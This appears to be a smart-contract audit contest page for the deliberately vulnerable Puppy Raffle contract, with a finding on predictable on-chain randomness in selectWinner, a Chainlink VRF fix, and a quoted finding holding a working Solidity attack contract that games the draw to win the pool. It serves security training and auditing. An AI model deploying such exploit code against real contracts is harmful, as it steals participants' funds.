Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

[H-2] Weak randomness in `PuppyRaffle::selectWinner` allows anyone to choose winner

sum1t_here

[H-2] Weak randomness in `PuppyRaffle::selectWinner` allows anyone to influence or predict the winner

Description

Hashing msg.sender, block.timestamp, and block.prevrandao together to determine a winner creates a predictable outcome. None of these values are truly random — they are either known ahead of time or directly controllable by the caller or a validator.

uint256 winnerIndex =

uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.prevrandao))) % players.length;

A malicious user can simulate this exact computation off-chain before submitting their transaction, and either time their call or manipulate msg.sender (via a contract with a chosen address) to land on a winning index. The same vulnerability applies to the rarity calculation:

uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.prevrandao))) % 100;

Since both the winner selection and rarity assignment use the same predictable inputs, an attacker can guarantee both winning the raffle and minting the rarest puppy in the same transaction.

Risk

Impact: High — an attacker can steal the entire prize pool and guarantee legendary rarity on every run.

Likelihood: High — this requires no special access, no funds beyond the entrance fee, and is a well-documented attack in the Ethereum ecosystem. Any technically capable participant can exploit this.

Proof of Concept

There are several attack vectors:

1. Validator manipulation

Validators know block.timestamp and block.prevrandao before the block is published. A validator who is also a raffle participant can selectively propose or withhold blocks until the computed winnerIndex lands on their own address. See the Solidity blog on prevrandao for a detailed breakdown of this attack.

2. msg.sender manipulation

A malicious user can deploy a contract, compute the winning msg.sender off-chain, and call selectWinner from that address. Since msg.sender is fully controlled by the attacker, they can brute-force a contract address (via CREATE2) that produces a winning index.

3. Timestamp manipulation

Miners and validators have limited but real influence over block.timestamp (within ~15 seconds). Combined with knowledge of block.prevrandao, this narrows the winning conditions to a computable range.

4. Full simulation attack

An attacker can simply simulate the selectWinner call at different timestamps off-chain using eth_call, iterating until they find a timestamp that produces their desired winner index, then submit the transaction timed to that block.

Using on-chain values as a randomness seed is a well-known attack vector in the blockchain space and should never be used in production for anything of value.

Recommended Mitigation

Use a cryptographically verifiable random number generator such as Chainlink VRF. This provides randomness that is provably unmanipulable by any on-chain actor, including validators.

- uint256 winnerIndex =

- uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.prevrandao))) % players.length;

+ // Request randomness from Chainlink VRF

+ uint256 requestId = i_vrfCoordinator.requestRandomWords(

+ i_gasLane,

+ i_subscriptionId,

+ REQUEST_CONFIRMATIONS,

+ i_callbackGasLimit,

+ NUM_WORDS

+ );

The winner selection and rarity assignment should both be moved into the VRF callback fulfillRandomWords, ensuring neither value can be predicted or influenced before the randomness is committed on-chain.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 5 days ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!